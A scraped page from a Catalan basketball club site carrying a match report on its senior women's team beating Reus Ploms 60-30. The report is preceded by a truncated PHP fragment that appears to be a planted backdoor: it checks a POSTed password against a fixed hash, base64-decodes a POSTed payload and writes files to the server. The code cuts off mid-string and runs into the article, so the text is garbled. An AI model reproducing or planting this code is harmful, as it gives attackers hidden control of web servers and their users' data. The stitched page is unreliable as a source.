function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior femení fa un clínic en defensa i esborra de la pista el Reus Ploms (60-30) - Tgn Bàsquet Club -

El sènior femení fa un clínic en defensa i esborra de la pista el Reus Ploms (60-30)

Updated: octubre 31, 2019

El TGN Bàsquet ha aconseguit aquesta nit una victòria tant contundent com important. El conjunt lila s’enfrontava a un dels grans rivals de la categoria, el Reus Ploms, que fins avui tenia el mateix balanç de victòries i derrotes que les tarragonines (4-1) i que es preveu que sigui un dels equips que lluitin per a classificar-se per a la final a quatre. Les liles havien patit la primera derrota del curs el cap de setmana passat (53-52 a la pista del CB Cornellà) però ha esvaït molt aviat qualsevol dubte d’aconseguir aquesta nit la victòria en un partit que s’ha avançat a la jornada del cap de setmana.

El Ploms es presentava com un equip a tenir en compte que disposa, a més, de la màxima encistelladora del grup 2 de Primera Catalana, Elena Quintana, que amb una mitjana de 19,6 punts per partit es presentava com una seriosa amenaça per al TGN Bàsquet. Però la defensa sobre Quintana —i en general sobre tot l’equip rival— va ser esplèndida. Laia López, que està fent un molt bon inici de lliga, va assecar la font d’anotació de la pivot reusenca, que tampoc va poder superar la intensitat de les altres interiors tarragonines i es va quedar en només quatre punts. L’encert en el tir exterior també va ser una altra arma poderosa. Els 8 triples de les locals (4 de Núria Vilamajor) van descentrar la defensa blanc-i-negra, que es va enfonsar en la segona meitat.

En la primera meitat el TGN Bàsquet va sortir disposat a deixar enrere la derrota del cap de setmana passat. El conjunt lila es va aplicar en defensa i no va deixar ni respirar el seu rival que va tardar fins a gairebé set minuts i mig a anotar la primera cistella. Aleshores l’equip blanc-i-negre ja perdia per 12-2, una diferència que seria premonitòria. El tir exterior, com en molts moments del partit, va servir al TGN Bàsquet per obrir el camp i dificultar la defensa de les visitants. Un triple de Núria Vilamajor —avui ha estat realment inspirada— i un altre de Laura Pascual, van obrir la primera escletxa en el resultat. Al final del primer quart, el resultat era de 15-4.

El Ploms va reaccionar només començar el segon període. El conjunt reusenc va marcar un parcial de 0-6 que va obligar Víctor Neila a demanar temps mort. Entre el final del primer quart i l’inici del segon, el parcial era d’1-8. VA ser Núria Vilamajor qui va tornar les coses al seu lloc amb un altre triple (18-10) i a partir d’aleshores, tot i que les visitants van mostrar una imatge millor que en el primer, el TGN Bàsquet va aguantar l’embranzida rival i va poder arribar al descans amb avantatge (24-16). Les tarragonines van tenir més problemes per anotar però gràcies al seu treball defensiu van ser capaces de mantenir a ratlla el rival.

El tercer període va suposar l’enlairament definitiu de les locals. La defensa va tornar a ser el pal de paller del TGN Bàsquet, que va deixar el Ploms en només nou punts, però el recital ofensiu va ser la clau per entendre com es va certificar el triomf. Així, dos triples més de Núria Vilamajor van noquejar l’equip visitant, que no podia contenir l’empenta lila. Una altra vegada, l’amenaça exterior va obrir la defensa reusenca, que no era a temps de tancar les penetracions de les locals, que trobaven forat per tot arreu. Com en tot el partit, les directrius de Neila eren clares, i després de rebot o recuperació de pilota, l’equip sortia com una bala al contraatac. La diferència va arribar als 17 punts i a partir d’aleshores no va parar de créixer (37-20, 7:15 pel final del 3Q). Les visitants semblaven desbordades i el resultat al final del període era de 47-25.

La superioritat lila no va tenir aturador en el quart i definitiu període. El Ploms havia perdut tota la confiança en atac, tot i que no abaixava els braços, però el resultat encara donava més energia al TGN Bàsquet que continuava defensant molt bé, sense donar opcions al seu rival. Les interiors es multiplicaven —com en tot el partit— per defensar Quintana, que somiarà amb Laia López, i l’activitat de les exteriors va anul·lar qualsevol intent de crear joc de les reusenques. Quan faltaven quatre minuts per a finalitzar el partit, el resultat era de 57-25 i tot estava dat i beneït.